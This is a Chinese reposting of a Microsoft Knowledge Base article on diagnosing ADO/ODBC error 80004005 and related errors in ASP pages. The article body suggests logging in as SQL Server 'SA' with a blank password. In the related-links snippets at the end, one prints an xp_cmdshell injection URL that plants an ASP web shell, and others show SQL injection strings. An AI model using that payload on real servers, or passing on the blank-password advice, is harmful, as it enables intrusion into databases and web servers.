关于对SQL注入80004005 及其它错误消息分析

文章中的信息适用于:

Microsoft Data Access Components versions 1.5, 2.0, 2.1, 2.5

Active Server Pages

Microsoft Visual InterDev, version 1.0

----------------------------------------------------------------------------

概要

本文详细讲述了 Microsoft 数据访问组件 (MDAC) 收到 0x800040005 错误的一些常见原因,MDAC 包括 ActiveX 数据对象、OLE DB 和远程数据服务 (RDS)。 同时,本文还讨论了其它一些错误消息,包括 80040e21、80040e14 和80040e10。

更多信息

80004005 错误消息可归纳为:“出于某种原因,我无法访问您的数据”。 本文给出了各种 80004005 错误消息的列表、其中列举了这些错误消息的最常见起因及其疑难解答步骤。 虽然本文假定您是在 Active Server Page (ASP) 页面(.asp) 中使用 ActiveX 数据对象 (ADO),但这些起因和很多疑难解答步骤同样适用于任何其它通过 ODBC 访问数据的环境。

错误消息列表

这一节我们介绍了各种错误消息的文本,以及导致错误的原因。

错误消息

Microsoft OLE DB Provider for ODBC Drivers error '80004005' [Microsoft][ODBC Microsoft Access 97 Driver]

The Microsoft Jet database engine cannot open the file '(unknown)'. It is already opened exclusively by another user, or you need permission to view its data.

原因

该错误的发生,通常是因为 Internet Information Server (IIS) 所使用的帐户(通常是 IUSR)没有正确的 Windows NT 权限,因而无法访问基于文件的数据库或包含文件的文件夹。请检查这些文件和文件夹的权限设置。 确认您能够创建和/或删除任何临时文件。 临时

文件一般都创建在与数据库相同的文件夹下,但也可以创建在其它文件夹下,如 /Winnt。您可以使用 Windows NT 文件监视器来检查访问文件失败的原因。 Windows NT 文件监视器可从以下 Web 站点上得到:

http://www.sysinternals.com。

如果您使用的是该数据库的网络路径(UNC 或映像驱动器),请检查共享、文件及文件夹上的权限。确认文件及数据源名 (DSN) 没有被标记为独占方式。使用一个使用本地驱动器号的系统 DSN。 如有必要,把数据库移至本地驱动器,然后对其进行测试。错误消息中的 other user(其它用户)有可能是 Visual InterDev。 请关闭任何包含该数据库数据连接的 Visual InterDev 工程。

错误也可能是由委派问题引起的。 检查可能存在的任何身份验证方法(“基本”而不是NTLM)。 如果连接字符串使用的是统一命名约定 (UNC),请尝试使用“基本身份验证”或一个绝对路径,如 C:\Mydata\Data.mdb。即使 UNC 指向的资源位于本地 IIS 计算机,前述错误也有可能发生。

当访问链接到某个表的 Microsoft Access 数据库时,如果这一表处在网络服务器上的Access 数据库中,这一错误也有可能发生。 这种情况下,请参见以下 Microsoft Knowledge Base 文章以找到可行的解决方法:

Q189408 PRB: ASP 无法访问 IIS 4.0 下的网络文件

错误消息Microsoft OLE DB Provider for ODBC Drivers error '80004005' [Microsoft][ODBC Microsoft Access 97 Driver] Couldn't use '(unknown)'; file already in use.

原因

数据库无法正确地为多个用户锁定。 详细信息请参见以下 Microsoft Knowledge Base文章:

Q174943 PRB: 80004005“Couldn't Use '(unknown)';File Already in Use”

错误消息

Microsoft OLE DB Provider for ODBC Drivers error '80004005' [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified.

原因

最常见的原因是因为 Global.asa 和 Global.asa 中初始化的连接字符串会话变量没有激发。 您可以通过在 .asp 页面中加入以下代码,来检查该变量有没有正确地初始化:

另一个常见原因是因为所使用的连接字符串中有太多的空格。

DSN = MyDSN; Database = Pubs;

尝试使用下面的语法代替:

DSN=MyDSN;Database=Pubs;

如果 Global.asa 文件没有激发,请检查并确认它是在 IIS 4.0 的应用程序根下,(如果运行的是 IIS 3.0,则应在虚拟根下,并且 Execute 复选框已经选中)。 此外,当 Windows NT 权限限制了对文件夹的访问时,程序设计中的一个错误也可能会妨碍 Global.asa 文件被激发。详细信息请参见 Microsoft Knowledge Base

文章:

Q173742 “BUG: 限制Web 访问时,Global.asa 不被执行”无法找到 DSN 名。

请检查并确认没有使用“用户”类型的 DSN。

如果使用的是文件 DSN 或系统 DSN,则尝试把连接字符串相应地改为 DSN=MySystemDSN 或 DBQ=MyFileDSN。 简化!

检查并确认安装了最新的驱动程序。 如有您不能肯定,请从以下 Web 站点下载最新的MDAC(Microsoft 数据访问组件):

http://www.microsoft.com/data/

错误消息

Microsoft OLE DB Provider for ODBC Drivers error '80004005' [Microsoft][ODBC

Driver Manager] Data source name not ??

原因

这个问题看起来与计算机上软件安装或卸载的顺序有关。 如果 ODBC 内核文件不同步(它们必须为同一版本),就可能出现这种错误。

请从以下 Web 站点下载最新版的 MDAC(Microsoft 数据访问组件),以升级所有的 ODBC 核心驱动程序:

http://www.microsoft.com/data/

错误消息

Microsoft OLE DB Provider for ODBC Drivers error '80004005' [Microsoft][ODBC Access 97 ODBC driver Driver]

General error Unable to open registry key 'DriverId'.

原因

这一错误是由从注册表中读取数值时引起的。 请用注册表编辑器 (Regedt32.exe) 检查注册表项上设置的权限。 您也可以用 Windows NT 注册表监视器 (NTRegMon) 来检查注册表读取失败。 NTRegMon 可从

以下 Web 站点下载:

http://www.sysinternals.com

错误消息

Microsoft OLE DB Provider for ODBC Drivers error '80004005' [Microsoft][ODBC SQL Server Driver][dbnmpntw] ConnectionOpen (CreateFile()).

原因

这一错误有两种原因。 它们都与权限有关,或者数据库与 Web 服务器不在一台计算机上,或者数据库正通过 UNC 路径(\\Server\Share) 被引用。 即使数据库与 Web 服务器位于同一台计算机上,UNC 路径也使 Web 服务器认为数据库好象位于网络上的另一台计算机上。

如果 .asp 页面正被匿名用户所访问,就会发生以下情况:

IIS 将使用(默认)Windows NT 帐户:

USR_。

因为该帐户是 Web 服务器的本地账户,所以网络上的其它计算机根本无从得知该帐户。当 IIS(在 IUSR 帐户的安全环境下运行)试图访问远程计算机上的任何资源时,远程计算机将验证其使用的帐户。 由于 IUSR 帐户是本地帐户,因此对于远程计算机来说,它是无从得知的,所以访问被拒绝。

当匿名访问引发这个问题时,有两个解决办法:

在“Internet 服务管理器”工具中,从 Web 属性下将匿名登录帐户从默认的本地帐户改为一个基于域的有效帐户。 在用户名字段中,输入要使用的域帐户,格式为 domain\userid。 这样,远程计算机就能用域控制器来验证 IIS 传递给它的安全凭据。

-或者-

在包含您想要访问的资源的远程计算机上复制的帐户

IUSR_。 如果帐户是在远程计算机上创建的,包含完全相同的名称和密码,Windows NT 把它

们视为等价帐户。

-或者-

如果 .asp 页面只允许经身份验证的访问,请参考以下内容:

如果页面不允许匿名访问,IIS 将会试图验证作出请求的用户的身份,并使用其安全凭据控制其所有活动,如访问数据库的活动。 下面对这种情形下失败的两个主要原因做了说明。

默认情况下,IIS 被配置为以 Windows NT Challenge/Response 作为其身份验证方法。

由于 Windows NT 4.0(及更早版本)安全模型的限制,经过 Windows NT Challenge/Response 身份验证的用户也无法访问远程计算机上的资源。 这通常

称为委派问题。 要验证是不是这种情况,可在“Internet 服务管理器”工具中,从 Web 属性下选择基本(明文)复选框,然后清除 Windows NT Challenge/Response。 如果这一步骤解决了问题,很明显这是一个委派问题。

-或者-

如果问题仍旧存在,可能是所使用的用户帐户没有正确的 SQL Windows NT 计算机权限。 不妨尝试使用一个明确拥有该SQL 计算机访问权限的帐户。

有关委派、IIS 如何通过身份验证来保护 Web 站点,以及相关问题的详细信息,请参见文章“IIS Authentication and

Security for Internet Developers”,

它位于以下 Web 站点:

http://www.microsoft.com/workshop/s...re/security.asp

错误消息

Microsoft OLE DB Provider for ODBC Drivers error '80004005' Microsoft][ODBC Microsoft SQL Driver] Logon Failed()

原因

该错误是在 SQL 服务器不接受或不认可所提交的登录帐户及/或密码(使用标准安全性时),或者没有任何 Windows NT帐户映射到 SQL 帐户(使用集成安全性时)时,由 SQL 服务器生成的。

如果使用的是标准安全性,说明 SQL 帐户名和密码不正确。 请尝试使用系统管理员帐户和密码(UID= "SA",密码为空)。 这些必须在连接字符串行中定义, 因为 DSN 不存储用户名和密码。

如果使用的是集成安全性,则检查调用页面的 Windows NT 帐户,找出它所映射的目标帐户。

SQL 不允许 SQL 帐户名中有下划线。 如果某人把 Windows NT 帐户 IUSR_machinename 手动映射到一个同名的 SQL 帐户,就会失败。 请把所有包含下划线的帐户都映射为 SQL 中不包含下划线的帐户名。

错误消息

Microsoft OLE DB Provider for ODBC Drivers error '80004005' [Microsoft][ODBC SQL Server Driver][SQL Server] Login failed- User: Reason: Not defined as a valid user of a trusted

SQL Server connection.

原因

SQL Enterprise Manager(企业管理器)中打开了集成安全性,而所使用的 Windows NT 帐户未被映射到 SQL 帐户。

请尝试把 SQL 改用标准安全性(在 Enterprise Manager 中,选择 Server/SQL Server/Configure/Security Options/Standard。

如果您是在 IIS 4.0 下运行,则取消选择该工程的密码同步。

错误消息

Microsoft OLE DB Provider for ODBC Drivers error '80004005' [Microsoft][ODBCMicrosoft Access 97 Driver]Couldn't lock file.

原因

这一错误可能是由于没有正确的权限为 Microsoft Access 数据库创建锁定文件 (.ldb) 而引起的。 默认情况下,锁定文件与 Microsoft Access .mdb 文件创建在同一文件夹下。

请尝试赋予访问数据库(通常是 IUSR_machinename)的用户以共享/文件夹的完全控制权限。

有时,共享文件夹权限被设置为只读。 您也可以尝试更改连接模式,这时可以使用以下示例代码:

Set Conn = Server.CreateObject("ADODB.Connection")

Conn.Mode = adModeShareDenyWrite '8

'From Adovbs.inc

'---- ConnectModeEnum values ----

'Const adModeUnknown = 0

'Const adModeRead = 1

'Const adModeWrite = 2

'Const adModeReadWrite = 3

'Const adModeShareDenyRead = 4

'Const adModeShareDenyWrite = 8

'Const adModeShareExclusive = &Hc

'Const adModeShareDenyNone = &H10

错误消息

Microsoft OLE DB Provider for ODBC Drivers error '80004005' [Microsoft][ODBC Microsoft Access 97 Driver] '(unknown)' isn't a valid path. Make sure that the path name is spel

led correctly and that you are connected to the server on which the file resides.

原因

Web 服务器所读取的路径是无效路径。 当 Global.asa 文件正被使用,而连接字符串是Web 服务器之外的另一台计算机上创建的时候,最容易发生这种错误。 如果路径是一个映像驱动器号,它可能只对创建连接字符串的客户计算机有效。

错误消息

Microsoft OLE DB Provider for ODBC Drivers error '80004005' [Microsoft][ODBC SQL Server Driver][SQL Server] The query and the views in it exceed the limit of 16 tables.

原因

查询过于复杂。 在查询中有过多的限制。

错误消息

Microsoft OLE DB Provider for ODBC Drivers error '80004005' [Microsoft][ODBC SQL Server

   DRIVER][DBNMPNTW] CONNECTIONWRITE (GETOVERLAPPEDRESULT()).

原因

“允许匿名用户”环境被关闭时,WINDOWS NT 在第一个请求完成后要关闭与 SQL SERVER 连接的管道。 这是因为,第一个到 SQL SERVER 的连接是在 IIS 匿名用户帐户中建立的。 然后,IIS 或者选择在同一线程上模拟浏览器客户,或者尝试去访问运行于模拟用户环境中的其它线程上的连接。 无论是哪种情况,WINDOWS NT 都会检测有没有谁试图使用某个已在其它用户环境中打开的网络命名管道句柄,并根据安全规则关闭该管道。 在 SQL SE

RVER 网络监视器看来,这是WINDOWS NT 发出的关闭命名管道的请求,从而引起 WEB 浏览器出错。

错误消息

MICROSOFT OLE DB PROVIDER FOR ODBC DRIVERS ERROR '80004005' [MICROSOFT][ODBCSQL SERVER DRIVER][DBMSSOCN] GENERAL NETWORK ERROR. CHECK YOUR NETWORK DOCUMENT

原因

这一错误可能发生在 SQL 服务器被重命名的情况下。 由于无法找到计算机名,引用旧名称的 DSN 将会失败。

错误消息

MICROSOFT OLE DB PROVIDER FOR ODBC DRIVERS ERROR '80040E21' ERRORS OCCURRED

原因

这一错误可能是由于试图向一个字段插入过多的数据,超过允许值而引起。 比如,一个MICROSOFT ACCESS 字段格式设置为只接受 25 个字符,而试图插入 26 个字符。

错误消息

MICROSOFT OLE DB PROVIDER FOR ODBC DRIVERS ERROR '80040E14' [MICROSOFT][ODBC MICROSOFT ACCESS 97 DRIVER]

SYNTAX ERROR IN INSERT INTO STATEMENT.

原因

某个列名可能是保留字,如 DATE。 请将列名称改为一个非保留字,如 SALEDATE。

错误消息

MICROSOFT OLE DB PROVIDER FOR ODBC DRIVERS ERROR '80040E10' [MICROSOFT][ODBC MICROSOFT ACCESS 97 DRIVER]

TOO FEW PARAMETERS. EXPECTED 1.

原因

查询语法中所使用的列名不存在。 往往,这只是个打字错误。 请对照数据库中的列名,检查查询字符串中的列名。 如果使用的是 MICROSOFT ACCESS,要确保使用的是实际列名,而不是列的“显示”名。

参考

如要启用 VISUAL INTERDEV 的远程工作站工作方式,请按照以下 MICROSOFT KNOWLEDGE BASE 文章所述,以建立系统DSN:

Q178215 HOWTO: 配置 VID 以用于身份验证 WEB 工程

Q174943 PRB: 80004005“COULDN'T USE '(UNKNOWN)';FILE ALREADY IN USE”

Q173742 BUG: 限制 WEB 访问时,GLOBAL.ASA 不被执行

Q172864 ASP 页面无法访问会话及应用程序对象

Q156526 连接 ACCESS 数据源时的一般错误 =51

Q175671 PRB: 访问时的 SQL80004005 CONNECTIONOPEN (CREATEFILE()) 错误

Q149425 IDC: 执行查询错误,没有定义为有效用户

Q167452 PRB: 使用 ACCESS 数据源时的‘NOT A VALID PATH'错误

Q125767 PRB: 执行 SQL 查询后的查询过于复杂错误

Q166659 PRB: 第二次尝试时访问 SQL 数据库失败

Q166029 PRB: 使用 ACCESS 时,无法打开不明文件

Q178215 HOWTO: 配置 VID 以用于身份验证 WEB 工程

(0)

相关推荐

  • 关于对SQL注入80004005 及其它错误消息分析

    文章中的信息适用于: Microsoft Data Access Components versions 1.5, 2.0, 2.1, 2.5 Active Server Pages Microsoft Visual InterDev, version 1.0 ---------------------------------------------------------------------------- 概要 本文详细讲述了 Microsoft 数据访问组件 (MDAC) 收到 0x80

  • PHP中怎样防止SQL注入分析

    本文实例分析了PHP中怎样防止SQL注入.分享给大家供大家参考.具体分析如下: 一.问题描述: 如果用户输入的数据在未经处理的情况下插入到一条SQL查询语句,那么应用将很可能遭受到SQL注入攻击,正如下面的例子: 复制代码 代码如下: $unsafe_variable = $_POST['user_input'];   mysql_query("INSERT INTO `table` (`column`) VALUES ('" . $unsafe_variable . "')

  • SQL注入详解及防范方法

    目录 一:什么是sql注入 二:SQL注入攻击的总体思路 三:SQL注入攻击实例 四:如何防御SQL注入 1.检查变量数据类型和格式 2.过滤特殊符号 3.绑定变量,使用预编译语句 五:什么是sql预编译 1.1:预编译语句是什么 1.2:MySQL的预编译功能 (1)建表 (2)编译 (3)执行 (4)释放 六:为什么PrepareStatement可以防止sql注入 (1):为什么Statement会被sql注入 (2)为什么Preparement可以防止SQL注入. 七:mybatis是如

  • MySQL解决SQL注入的另类方法详解

    本文实例讲述了MySQL解决SQL注入的另类方法.分享给大家供大家参考,具体如下: 问题解读 我觉得,这个问题每年带来的成本可以高达数十亿美元了.本文就来谈谈,假定我们有如下 SQL 模板语句: select * from T where f1 = '{value1}' and f2 = {value2} 现在我们需要根据用户输入值填充该语句: value1=hello value2=5 我们得到了下面的 SQL 语句,我们再提交给数据库: select * from T where f1='h

  • XSS & SQL注入

    XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  X Web Security - XSS & more X  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  作者: CyberPhreak 翻译: 黯魂 [S.S.T] ~介绍 在这篇文章中我将说明所有关于XSS以及更多相关的知识.通过这篇文档,我希望能让你明白什么是XSS,为什么使用XSS,以及怎样使用XSS.一旦你学会了,你将需要发挥自己的创造力,因为大多数人都修补了简单的XSS漏洞.但是他们所忘记做的是修补比

  • 最详细的SQL注入相关的命令整理 (转)第1/2页

    1.   用^转义字符来写ASP(一句话木马)文件的方法: ?   http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("l"^)^</script^> >c:\mu.asp';-- ?   echo ^<%execute^(reques

  • PHP中防止SQL注入实现代码

    一. 注入式攻击的类型 可能存在许多不同类型的攻击动机,但是乍看上去,似乎存在更多的类型.这是非常真实的-如果恶意用户发现了一个能够执行多个查询的办法的话.本文后面,我们会对此作详细讨论. 如 果你的脚本正在执行一个SELECT指令,那么,攻击者可以强迫显示一个表格中的每一行记录-通过把一个例如"1=1"这样的条件注入到WHERE子句中,如下所示(其中,注入部分以粗体显示): SELECT * FROM wines WHERE variety = 'lagrein' OR 1=1;'

  • C#防SQL注入代码的三种方法

    对于网站的安全性,是每个网站开发者和运营者最关心的问题.网站一旦出现漏洞,那势必将造成很大的损失.为了提高网站的安全性,首先网站要防注入,最重要的是服务器的安全设施要做到位. 下面说下网站防注入的几点要素. 一:丢弃SQL语句直接拼接,虽然这个写起来很快很方便. 二:如果用SQL语句,那就使用参数化,添加Param 三:尽可能的使用存储过程,安全性能高而且处理速度也快 四:屏蔽SQL,javascript等注入(很是主要的),对于每个文件写是不太可能的.所以要找到对所有文件起作用的办法.我在网上

  • SQL数据库的高级sql注入的一些知识

    [概 要] 这篇文章讨论常用的"sql注入"技术的细节,应用于流行的Ms IIS/ASP/SQL-Server平台.这里探讨有关这种攻击各种可以注入程序访问数据和数据库防范的方法.这篇文章面向两种读者:一是基于数据库web程序开发人员和审核各种web程序的安全专家. [介 绍] 结构化查询语言(SQL)是一种用来和数据库交互的文本语言SQL语言多种多样,大多的方言版本都共同宽松地遵循SQL-92标准(最新的ANSI标准[译者注:目前最新的是SQL-99]).SQL运行的典型的操作是&q

  • sql注入过程详解_动力节点Java学院整理

    SQL注入攻击的总体思路是: 1.发现SQL注入位置: 2.判断后台数据库类型: 3.确定XP_CMDSHELL可执行情况 4.发现WEB虚拟目录 5. 上传JSP木马: 6.得到管理员权限: 一.SQL注入漏洞的判断 一般来说,SQL注入一般存在于形如:HTTP://xxx.xxx.xxx/abc.jsp?id=XX等带有参数的jsp或者动态网页中,有时一个动态网页中可能只有一个参数,有时可能有N个参数,有时是整型参数,有时是字符串型参数,不能一概而论.总之只要是带有参数的动态网页且此网页访问

随机推荐